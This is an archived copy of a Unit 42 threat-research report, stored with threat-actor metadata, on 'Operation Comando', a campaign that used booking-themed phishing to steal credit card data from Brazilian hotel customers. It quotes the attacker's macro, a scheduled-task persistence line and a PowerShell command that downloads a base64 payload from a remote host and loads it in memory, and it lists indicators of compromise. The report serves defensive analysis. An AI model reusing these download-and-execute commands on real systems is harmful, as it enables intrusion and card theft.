{ "id": "a43d2ac7-baea-44fe-910d-d91316caa16e", "created_at": "2026-04-06T00:21:10.67703Z", "updated_at": "2026-04-10T03:35:56.566188Z", "deleted_at": null, "sha1_hash": "93579e1cdc4b3e3bcbe7809cd550a1c9f6f23251", "title": "Operation Comando: How to Run a Cheap and Effective Credit Card Business", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1178214, "plain_text": "Operation Comando: How to Run a Cheap and Effective Credit\r\nCard Business\r\nBy Unit 42\r\nPublished: 2019-03-12 · Archived: 2026-04-05 15:18:46 UTC\r\nIn December 2018, Palo Alto Networks Unit 42 researchers identified an ongoing campaign with a strong focus\r\non the hospitality sector, specifically on hotel reservations. Although our initial analysis didn’t show any novel or\r\nadvanced techniques, we did observe strong persistence during the campaign that triggered our curiosity.\r\nWe followed network traces and pivoted on the information left behind by this actor, such as open directories,\r\ndocument metadata, and binary peculiarities, which enabled us to find a custom-made piece of malware, that we\r\nnamed “CapturaTela”. Our discovery of this malware family shows the reason for the persistent focus on hotel\r\nreservations as a primary vector: stealing credit card information from customers.\r\nWe profiled this threat actor and that has resulted in uncovering not only their delivery mechanisms, but also their\r\narsenal of remote access tools and info-stealing trojans, both acquired from underground forums as well as open\r\nsource tools found in GitHub repositories.\r\nHave you ever wondered how an actor can run a very cheap and effective credit card data underground business?\r\nWelcome to “Operation Comando”.\r\nThe attacker’s delivery mechanisms\r\nOur telemetry for this campaign identified email as the primary delivery mechanism and found the first related\r\nsamples were distributed in August 2018. Topics used by the actor are typically related to travel bookings and\r\nvouchers, and target mainly Brazilian victims. Table 1 shows a representative list of typical subjects and\r\nattachment names found during the campaign.\r\nEmail Subject Attachment names\r\nReserva para tres\r\nquartos\r\n“Ficha cadastral Leticia Ferreira Mendes.ppam”, “Ficha cadastral Jacinto Mendes da\r\nSilva.ppam”, “Ficha cadastral Marcos Portela Correa.ppam”, “Ficha cadastral\r\nFrancisco Prado.ppam”\r\nReserva Veirano\r\nAdvogador\r\nRoominglist Veirano Advogados .docx\r\nCorrigir data da\r\nreserva para o dia 03\r\nBooking - Dados da Reserva.docx\r\nVoucher para reserva Voucher para reserva 02.docx\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 1 of 17\n\nReserva Voucher de Reserva ADRIANA MILLER RODRIGUES.ppa\r\nTable 1 Some email subjects and attachment names representative of this campaign.\r\n While investigating the malicious documents used in the campaign, we discovered an interesting consistency in\r\nthe document metadata. The author consistently uses an acronym throughout their work - “C.D.T Original” (see\r\ndetails on Figure 1).\r\nFigure 1 Example of malicious document metadata\r\nThe attackers make use of multiple common off-the-shelf methods that are observed in many campaigns, such as\r\nexternal references to remote scripts executed by MSHTA. Following this approach, this actor can find multiple\r\ntools and resources to perform their activities, and at the same time, make attribution and tracking more difficult\r\nfor analysts. The most prevalent combinations of methods observed are depicted in Figure 2.\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 2 of 17\n\nFigure 2 Multiple delivery mechanisms.\r\nAs an example of an email delivery used during December 2018 campaigns, let’s look at what pretended to be a\r\nrooming list (SHA256: ac70d15106cc368c571c3969c456778b494d62c5319dc366b7e2c116834c6187), which\r\nfollows one path from Figure 2, more precisely the steps described in Figure 3.\r\nFigure 3 December 2018 campaign delivery example\r\nThe malicious documents contain a simple Macro, which executes a remotely-hosted script using MSHTA:\r\nPublic Sub Auto_Open()\r\nvar0 = \"MSHTA https://bit[.]ly/2QXNTHi\"\r\nVar = var0\r\nShell (Var)\r\nEnd Sub\r\nThe landing URL resolves to:\r\nhxxps://internetexplorer200[.]blogspot[.]com/\r\nThe statistics for the URL-shortened link on bit.ly confirm the observations from our telemetry, showing targets\r\nmainly in Brazil, as depicted in Figure 4 Distribution of Bit.ly campaign on 27-28th December.\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 3 of 17\n\nFigure 4 Distribution of Bit.ly campaign on 27-28th December\r\nMSHTA executes VBScript contents that are encoded/obfuscated using a very simple algorithm (note the presence\r\nof Portuguese words throughout the code).\r\nFigure 5 First stage VBScript code run via MSHTA\r\nThis results in the following scheduled task created in the system, where a new second-stage script is invoked via\r\nMSHTA from another remote location. Note that the second-stage VB code contains a reference to “CDT” in a\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 4 of 17\n\ncomment.\r\n\"set shhh = CreateObject(\\\"WScript.Shell\\\")\\r\\n   Dim var1\\r\\n var1 = \\\"cmd.exe /c SchTasks /Create /sc MINUTE\r\n/MO 240 /TN AdobeUpdateSD /TR \\\"\\\".exe https://minhacasaminhavidacdt.blogspot[.]com/\\\"\\r\\nshhh.run var1,\r\nvbHide\\r\\n\"\r\nFigure 6 Second-stage VB script\r\nThis second-stage VBScript code ends up loading a final payload in memory via PowerShell reflection, fetching\r\nthe binary content from a file with a GIF extension:\r\n\"CreateObject(\\\"Wscript.Shell\\\").run  \\\"cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -\r\nnoexit -command [Reflection.Assembly]::Load([Convert]::FromBase64String((New-Object\r\nNet.WebClient).DownloadString('http://achoteis.com[.]br/images/64.gif'))).EntryPoint.Invoke($null,$null)\\\"\\r\\n\"\r\nThe final payload delivered in this case is Revenge Remote Access Trojan (RAT), a commodity tool which can be\r\nused to facilitate information theft.\r\nInfrastructure analysis\r\nAt the infrastructure level, the attacker makes use of dynamic DNS (DDNS) services such as DuckDNS, WinCo,\r\nor No-IP, many of which offer free accounts lowering the investment required for attacker infrastructure. Some\r\nexamples of the domains in use are detailed in Table 2.\r\nDynamic DNS Domains\r\nsystenfailued.ddns[.]com[.]br\r\noffice365update[.]duckdns[.]org\r\ncdtoriginal[.]ddns[.]net\r\nTable 2 Examples of domains associated with this campaign using DDNS providers\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 5 of 17\n\nIn addition to using free services, paste sites, and compromised sites, we have also identified at least one domain\r\nthat appears to be actor-owned. The domain “fejalconstrucoes[.]com[.]br” has been used to host payloads, as well\r\nas send emails to potential victims. Figure 7 DNS WHOIS record shows details on the domain, which has been\r\nregistered using the UOL service in Brazil.\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 6 of 17\n\nFigure 7 DNS WHOIS record\r\nEmails with malicious attachments belonging to this campaign have been found with the following characteristics:\r\nDomain: fejalconstrucoes[.]com[.]br\r\nEmail Senders: mmcorrea@fejalconstrucoes.com.br, marcos@fejalconstrucoes.com.br\r\nAttachment names: Contrato Anual FEJAL Construçoes.ppa\r\nAs mentioned before, an interesting detail on domains and paths used by the attacker is the use of the recurring\r\nacronym “CDT”, as for example:\r\nhxxp://bit[.]ly/cdtqueda\r\nhxxp://cdtoriginal.ddns[.]net\r\nIdentifying the main business driver: “CapturaTela”\r\nDuring our investigation, one open directory identified allowed us to find several payloads used by the attacker.\r\nTable 3 displays the set of payloads and documents found. The acronym “CDT” keeps appearing even in file\r\nnames used.\r\nFilename SHA256\r\nCDT.hta 4485a8f339171ca86f7e38b912f0f28072ffe04404d5062af3a60f322566f870\r\nCopia Detalhe da reserva -\r\nBooking.ppam\r\nac70d15106cc368c571c3969c456778b494d62c5319dc366b7e2c116834c6187\r\nDadosDaReserva.doc 03483d2e701f8f90c9cc46b37f12f1cef995e4cca4b5c4b9e67947f560275677\r\nDillI.js d5f4d7fb7c8042b047e9f3d93d5f02841f01889ba8a899c0c1ed7064129e3bb4\r\nquasar.jse 03d7de252c30c87d6b156b4fbcdcd008ef6bae319a9c42613aaa01428bd490e3\r\nTable 3 Contents found in an open directory at cdtmaster[.]com[.]br\r\nDespite the filename, \"quasar.jse\" is not QuasarRAT, but instead a JS script which contains a basic base64\r\nencoded payload dropper (see Figure 8), with a very simple and interesting payload for our investigation.\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 7 of 17\n\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 8 of 17\n\nFigure 8 JS base64 payload dropper\r\nThe decoded payload is a PE file, written in .NET, with information-stealing capabilities. One of its main methods\r\ngives name to our malware family “CapturaTela”, and as its Portuguese name indicates, it has the capability to\r\nsave a screenshot into a Bitmap object.\r\nFigure 9 CapturaTela method's screen capture capabilities.\r\nThe main functionality of this malicious information-stealing trojan is the following (see Figure 10):\r\nIterate over the open processes list and check for specific window titles. The title has to contain either “ls .\r\nB” or “o . B” for the sample to perform further activity.\r\nIf the title is found, a screenshot will be taken and sent by email as a JPEG attachment (see Figure 12).\r\nIt will kill existing Chrome processes when done. The windows' titles are probably based on Chrome tag\r\ncontents.\r\nFigure 10 Main functionality loop of CapturaTela\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 9 of 17\n\nFigure 11 Email exfiltration capabilities of CapturaTela\r\nIn order to validate the functionality, we decided to create a simple web page matching the title content and\r\npatched the malicious sample to use a test email account under our control (see Figure 12).\r\nFigure 12 Test HTML page and debugging CapturaTela functionality\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 10 of 17\n\nAs a result, as displayed in Figure 13, we confirmed the format and contents of the exfiltrated information that the\r\nattacker was planning to collect from its victims.\r\nFigure 13 Email received with data exfiltrated\r\nSo, the only remaining question for our investigation was the kind of content and window titles that this\r\ninformation-stealing trojan was looking for?  Which kind of web pages could contain “ls · B” or “o · B” as part of\r\ntheir title?\r\nInitially, finding a website with these properties seemed to be an impossible task, but we started the research based\r\non what we knew around the targets and email delivery session metadata used on these campaigns. From this data,\r\nwe were able to identify potential target websites containing certain – but common to the industry and nature of\r\nthe business – terms in their website page titles, in both English and Portuguese, that would match the string\r\npattern-matching described above and invoke the malware’s credit card stealing capabilities. The websites found\r\nlead us to the fact that the attacker’s focus is on getting the victim’s full credit card details during a given purchase\r\nprocess.\r\nAfter analyzing several CapturaTela samples, and extracting the contents of the email configuration portion,\r\nseveral interesting strings were found as displayed in Table 4.\r\nInteresting strings\r\nComando30\r\nComando30@cdt\r\ncomando50\r\nTable 4 Interesting strings in email configurations\r\nThe continuous use of the “CDT” acronym, and the presence of the word “Comando”, which we could associate\r\nto the first letter, led to us to choose “Operation Comando” to describe this campaign.\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 11 of 17\n\nExtensive use of Remote Access Trojans\r\nAside from the use of the custom trojan CapturaTela, the actor makes extensive use of several other remote access\r\ntrojans to perform its malicious activities. The following RAT families has been observed during the actor\r\ncampaign.\r\nRAT Family\r\nLimeRAT\r\nRevengeRAT\r\nNjRAT\r\nAsyncRAT\r\nNanoCoreRAT\r\nRemcosRAT\r\nTable 5 Top RAT families observed in this campaign\r\nThe extensive use of these RAT tools potentially increases the business objectives, given the amount of\r\ninformation the actor can obtain on top of credit card purchase results stolen from target websites via infected\r\nvictims.\r\nThere are several examples of RAT families used that can be found in GitHub such as:\r\nhttps://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp\r\nhttps://github.com/NYAN-x-CAT/Lime-RAT\r\nOverlaps with other published research\r\nSome of the domains and samples found on this investigation have been already researched and reported by Yoroi.\r\nBased on the details of our research, we have a strong belief that despite some minor overlaps in the techniques\r\nused, this campaign is not related to Gorgon Group.\r\nConclusions\r\nOperation Comando is a pure cybercrime campaign, possibly with Brazilian origin, with a concrete and persistent\r\nfocus on the hospitality sector, which proves how a threat actor can be successful in pursuing its objectives while\r\nmaintaining a cheap budget. The use of DDNS services, publicly available remote access tools, and having a\r\nminimum knowledge on software development (in this case VB.NET) has been enough for running a campaign\r\nlasting month, and potentially gathering credit card information and other possible data.\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 12 of 17\n\nWhile cybercrime campaigns like this remain active, Palo Alto Networks customers are protected from these\r\nthreats in the following ways:\r\nWildFire detects all malicious documents and payloads delivered as malware.\r\nAutoFocus customers can track this campaign using the following tag: OperationComando\r\nTraps blocks all of the files associated with this campaign.\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report\r\nwith our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections\r\nto their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat\r\nAlliance, visit cyberthreatalliance.org.\r\nIndicators of Compromise\r\n Infrastructure\r\nfejalconstrucoes[.]com[.]br\r\ninternetexplorer200[.]blogspot[.]com\r\noffice365update[.]duckdns[.]org\r\nolhomagicocdt[.]duckdns[.]org\r\n498408[.]ddns[.]net\r\nSystenfailued[.]ddns[.]com[.]br\r\ninternetexploter[.]duckdns[.]org\r\nssl9294[.]websiteseguro[.]com\r\nfejalconstrucoes[.]com[.]br\r\nc-d-t[.]weebly[.]com\r\nMalicious documents\r\n55732ba1b1e94add5e75e90d5eba137bfbfbd35e537b8d5c9a01365f5a6407d7\r\n7f13f449c80cc003d369c6b6002fd4912788e014ce35e97b29ba168136c6ece6\r\n47c471da52aa808250357c4638078c9e13797bb6a8a8b169d4b33d95ff230e89\r\n0c85b2ebc7c5316b7878239daf6a611fc2d0a05966f541e83e19db96f41fd3aa\r\n62f82e636924980b622204368f586723feb82594ce256e2e65ac5307fd67d669\r\n1c637cf4276b589f1b2806a77310b90c214cd0b026e4ec69448887be331ba5b3\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 13 of 17\n\nd96eaf8f22ec5cb9edba6369f9980efc8b0f76bf35eaf92aa5cb5e03669ddd9f\r\n1df7ace77a7f146b1bbd5c881134083f886ea83017f4619a9e62a9743909cdd1\r\n03483d2e701f8f90c9cc46b37f12f1cef995e4cca4b5c4b9e67947f560275677\r\nac70d15106cc368c571c3969c456778b494d62c5319dc366b7e2c116834c6187\r\n796c02729c9cd5d37976ddae205226e6339b64859e9980d56cbfc5f461d00910\r\nd67e160ccc6ac2fb8cd330e9fd53389fb1f99fad680d27045e5291e9d23d9317\r\n7f41ae21f3ad37505e5b3d0551caeb85bc9e07571d7d98acd3489b5db8ba6741\r\n3f3718b7e50eee8b0b3e4a4da8c5a0302623b5800eb7bc0718036f77a6ec72c0\r\na44e08b7ebd6bf73a9eb1b5a483987a1f0e3fdfe12b05a7a8f4ec1febfcf959e\r\n4211e091dfb33523d675d273bdc109ddecf4ee1c1f5f29e8c82b9d0344dbb6a1\r\nfd8781f125ac1ee68afb8dba61e17373ebe57bfd18850a01d41caaddde4cffcb\r\n269eb444415489a7898af36f1ba105129655226c98753d87afec651219e158c7\r\nee9d3c90df5c01dc6e2079d1219be752542a452988c4a25f34b8ee22be799332\r\n41b57429b00383f2b5d60fb22283b5c14a94ab8619c527e7d749e64b56d31518\r\nce44559beb4a5d52d962ab9e375970ef1d8e9f22a0be8c971b0244ebca61b2f2\r\nccd23e44662953d0837ca12728854bfd61f5ea14293a1620c3b48ba8f435a432\r\n57f31ef70a8b8b39659659abd0f1c8974fe23d2cbd2194d097375b2667a5424b\r\nf534f9b1cc64f03c32d59acdf9d58653bb0076798805af12e6cd914cbbfcf5fa\r\n846a89bbcf6c907fd915699a232c1f9acae0756fdc12c590198bfe65b4c90f44\r\n4f2ce6883b7057bde6baed2607e4645e4745db9ebfb20872e425944ba8ec3425\r\n722a2d8d4c1fb1e5195df50b159cdce0b05333acbb3ec90d24310331d21d2514\r\ne54bfccc796a4f779d332e535f78a5b118dbcd8a8971e39ac059ee9f069a1203\r\n4f4ea063d5bd22f1c57cdcf89d40339ddd5d5741c1b1dabfe52a474d70be9d04\r\n CapturaTela\r\n c7f3673ca116f76b16a7e00d81553abb0df02e75d4ac8fb6d3af52d351d9b46a\r\n904a4799edf642e6e685a137c88691f08b51643e539bea8de9e4cdf8c6251c7f\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 14 of 17\n\na03bc280123541518845cc167b4e812bbe9682696af4eeac041385cc0a00f5c6\r\nRATs\r\n2b343e0b0aa8de557fa11c9918f1b93ab6e88d9bd11565c587852d4d17bcf5a8\r\n57d83d5928bb8926718e732a85dd69dffe6ff61ff7edd9b843a50959f2fd1256\r\n33195ec463ba9d627a0c177eca366bbefa34306170449a5c0ef7661319ba2b05\r\n7eaea64fdfdc4f35ffe3036ee03f54c4aace204533a9d157faafa4a23221980c\r\ne76772ae83e2c79ed4aa80b5b7f4b42c46cea45ed1d15bd004b0dc71bfc41945\r\n977d940de630fff225e4917927d47100b75b56444c4117a22aa34b1450dc2930\r\n8a700793012385a706ef277f043bb5bf8a5ef877e3ba1fac3b5601df7fb36a30\r\nc740fe0dbf5aebf5f34e392a9bff0d4a19bf20ff553bb734574c2593ddcbbfa1\r\n10a7ba12bebaa572eb6eb4bef6d1a5043c5403bf796626a478205b344c4dc8c2\r\n4aff04954efd6cb02b1ba18831a72d44b2346db94e944a9f96c652f5944834d0\r\nd735d39de62009d09d7125f71cd774b23b6ab4a51d1dbb3d49003a5657b3477f\r\n9ad38281585897b1d49632ad049c700814f72e20edc46bbc43ba510413ac6f92\r\n877453c0e614e732eb9ee378693cf92263d2373e09c8287e3a4a821ecee29764\r\nb82c7535e41cddade675587ddaac9cb63fdf1973968f10f3a2bc1ea5409a29c2\r\nec824085dac0d7e0d2e3953d241756a78635a32ad442b7909f0895fd62b08010\r\n5c073adb376b57c99faa9cf10114beda732b13d04b7ed45a32c23eb043ec608f\r\n8d1db84b71eb1f38f95c13c89a6adfbc64d7ca5c5a5165ae7919e0d1e6fadc45\r\nb278ccf189d51b085390a985526ff37455ebe249ca9da69f64e2376979c56e6b\r\ne99df30a89dee25f56c2f35b20de2206406934f2e6ab043e299482649dce2cb8\r\n8e738b2239bbca9f50eab5f3cf3cbe58138e3b2515221c67e7eb934e2d3c7486\r\nb904e2823144ca9ab3161c3e508a88dc35922340e4ff2858e06b40e638bfd359\r\n99b70d49377117000eaf367c037ed68c4898b0d8769f7bff88a438a9d82db214\r\n982e2abc769f579a8753e8b2f65e0b0bbfbbdbae14b88f0ed697b635a9f4e38f\r\n03cb44736cdd60318af8399047507b011b95fadd4784b1607b28ad4940a9a36e\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 15 of 17\n\ne9f42c7fbedf0054391c3a85b79a34b5be134b40a83961cc90d0e473380fde1c\r\n6c45909d6311f8d356ddc704b27bd975cb3336a7b6e172206165bff613f94a2a\r\n9025c9b8cfc57e7dda5e742f18d69b4c4477f9254d10c5df15b7a6ffcf7d5985\r\nae3cddb0f665d739ebf5342a968585a5d13d54068ef59a51e82e739d184c6b3b\r\nd5baf4a27994ef2110bcc3a0b3ff2cd3815bac36d271462d1a39f77063bae9a5\r\nb0593829ea59d267f511f2685aa8ecf31860e123e0928ca8bf3fc1e30b3c4953\r\n1c30a54a8ad30faff0a7b309d377127ed739ea80c510d7526bbb5cbe6ef5cfc9\r\n498fd1c4cb16f39974555d6e596fcea6c7da73f9f0f30f57fdc8177fc3feaa4e\r\n1c604e040c04be9fad3129d7bd9c69b7f8057050b2002605dde1f5e60817f89a\r\n5dfd79503b19b67052ec060d74e1f2a9a5ee34de74d578c5b4499468bad8f1cb\r\nbc4c98116fadbcef2abfd0fe62a15b154a3b8a8eb329a877d64edc59260519c4\r\n9c794069b4d6346f8152b938e4f846af63d1f1015c935579d99af1c434789406\r\n7923c59d1405deacaceb26722db97714cf955610e02bf6d28051505331603606\r\na03bc280123541518845cc167b4e812bbe9682696af4eeac041385cc0a00f5c6\r\nc7f3673ca116f76b16a7e00d81553abb0df02e75d4ac8fb6d3af52d351d9b46a\r\n824d080a4da2275951a28285b66faac1698205dff181fe5fa1cf172ac1a17d8f\r\n0b04028774f0e166dcbe0f993b72c430dc15364e9cc52c221bdadcc9833816f2\r\n22e9260c6a4af1d42c353c7004cb2f5f245cea5e22572b111fcef4318c17e567\r\n904a4799edf642e6e685a137c88691f08b51643e539bea8de9e4cdf8c6251c7f\r\n7a9e3038d498d5ecaed19f6a80d9b0b7d73d47e669be8d61ca32d87566d7a035\r\n16ea765b2c51eadc61c6501b4ba96073a7d50f8cd7898285ffad49ba14a121dd\r\n18199bb3ad69901ef0040aa7445d6f0c8571a19cdade3115ffc9c142c0b5b721\r\nb940dc214f6a0be58e93f07aafcbc5a7518544f745413360269949664909fecd\r\n2d26bc42a499c4658523193ade85df13ab397d375fa593a757c54a6f1c71f221\r\n94a38857ebeed7d10480fb91a391a891d5a11137fabb8fc67b71c989b5e328e6\r\n116da8803ac9b2dd7e1149567f227d552e84db86dd7a33ad69e15b560f0fa177\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 16 of 17\n\n2945e6424f51e6077620a867e0f9c725b9b816164366912289ab6c24fdfcb9e6\r\n88d1a891cfdf09b7e1882582a82c3218d5606ed530764d34ee1410198ca9ee8b\r\n96424d66b7423dc54b35e4968a809a8b67d1dd8e7d8d3b0d84434edb94c822c5\r\n3158906cf7cb3186654bbb62d087b9a150c12c51d2ad67dd9003abeb0f69626a\r\n4e62dcea72cf73481dd8dae2bbeb8e1352a5f2510f3deb98ec0b653a4d21f8d8\r\n5370711dd45b84b9644b635d03baad08d75ff740364e93ed023adc9c4a297c43\r\n02254a03f08055399806b6457ee5e4fe6cfc47c6f75254434a14332d4c43afe5\r\nbf07b4ba117eb7d0ac59cbdd775e6a509c06a462b709b4f2d10979c9e5b3cf85\r\nSource: https://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA" ], "references": [ "https://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/" ], "report_names": [ "operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business" ], "threat_actors": [ { "id": "414d7c65-5872-4e56-8a7d-49a2aeef1632", "created_at": "2025-08-07T02:03:24.7983Z", "updated_at": "2026-04-10T02:00:03.76109Z", "deleted_at": null, "main_name": "COPPER FIELDSTONE", "aliases": [ "APT36 ", "Earth Karkaddan ", "Gorgon Group ", "Green Havildar ", "Mythic Leopard ", "Operation C-Major ", "Operation Transparent Tribe ", "Pasty Draco ", "ProjectM ", "Storm-0156 " ], "source_name": "Secureworks:COPPER FIELDSTONE", "tools": [ "CapraRAT", "Crimson RAT", "DarkComet", "ElizaRAT", "LuminosityLink", "ObliqueRAT", "Peppy", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "e819f7c1-855b-4834-b30c-493832336ddb", "created_at": "2022-10-25T16:07:23.939418Z", "updated_at": "2026-04-10T02:00:04.796807Z", "deleted_at": null, "main_name": "Operation Comando", "aliases": [], "source_name": "ETDA:Operation Comando", "tools": [ "AsyncRAT", "Atros2.CKPN", "Bladabindi", "CapturaTela", "Jorik", "LimeRAT", "Nancrat", "NanoCore", "NanoCore RAT", "Remcos", "RemcosRAT", "Remvio", "Revenge RAT", "RevengeRAT", "Revetrat", "Socmer", "Zurten", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "18278778-fa63-4a9a-8988-4d266b8c5c1a", "created_at": "2023-01-06T13:46:38.769816Z", "updated_at": "2026-04-10T02:00:03.094179Z", "deleted_at": null, "main_name": "The Gorgon Group", "aliases": [ "Gorgon Group", "Subaat", "ATK92", "G0078", "Pasty Gemini" ], "source_name": "MISPGALAXY:The Gorgon Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "97fdaf9f-cae1-4ccc-abe2-76e5cbc0febd", "created_at": "2022-10-25T15:50:23.296989Z", "updated_at": "2026-04-10T02:00:05.347085Z", "deleted_at": null, "main_name": "Gorgon Group", "aliases": [ "Gorgon Group" ], "source_name": "MITRE:Gorgon Group", "tools": [ "NanoCore", "QuasarRAT", "Remcos", "njRAT" ], "source_id": "MITRE", "reports": null }, { "id": "e1e83b71-854a-4ddf-82ed-141c1d151c3c", "created_at": "2023-01-06T13:46:38.934536Z", "updated_at": "2026-04-10T02:00:03.150803Z", "deleted_at": null, "main_name": "Operation Comando", "aliases": [], "source_name": "MISPGALAXY:Operation Comando", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6c4e4b91-1f98-49e2-90e6-435cea8d3d53", "created_at": "2022-10-25T16:07:23.693797Z", "updated_at": "2026-04-10T02:00:04.711987Z", "deleted_at": null, "main_name": "Gorgon Group", "aliases": [ "ATK 92", "G0078", "Pasty Draco", "Subaat", "TAG-CR5" ], "source_name": "ETDA:Gorgon Group", "tools": [ "AgenTesla", "Agent Tesla", "AgentTesla", "Atros2.CKPN", "Bladabindi", "CinaRAT", "Crimson RAT", "ForeIT", "Jorik", "LOLBAS", "LOLBins", "Living off the Land", "Loki", "Loki.Rat", "LokiBot", "LokiPWS", "MSIL", "MSIL/Crimson", "Nancrat", "NanoCore", "NanoCore RAT", "Negasteal", "NetWeird", "NetWire", "NetWire RAT", "NetWire RC", "NetWired RC", "Origin Logger", "Quasar RAT", "QuasarRAT", "Recam", "Remcos", "RemcosRAT", "Remvio", "Revenge RAT", "RevengeRAT", "Revetrat", "SEEDOOR", "Scarimson", "Socmer", "Yggdrasil", "ZPAQ", "Zurten", "njRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434870, "ts_updated_at": 1775792156, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/93579e1cdc4b3e3bcbe7809cd550a1c9f6f23251.pdf", "text": "https://archive.orkl.eu/93579e1cdc4b3e3bcbe7809cd550a1c9f6f23251.txt", "img": "https://archive.orkl.eu/93579e1cdc4b3e3bcbe7809cd550a1c9f6f23251.jpg" } }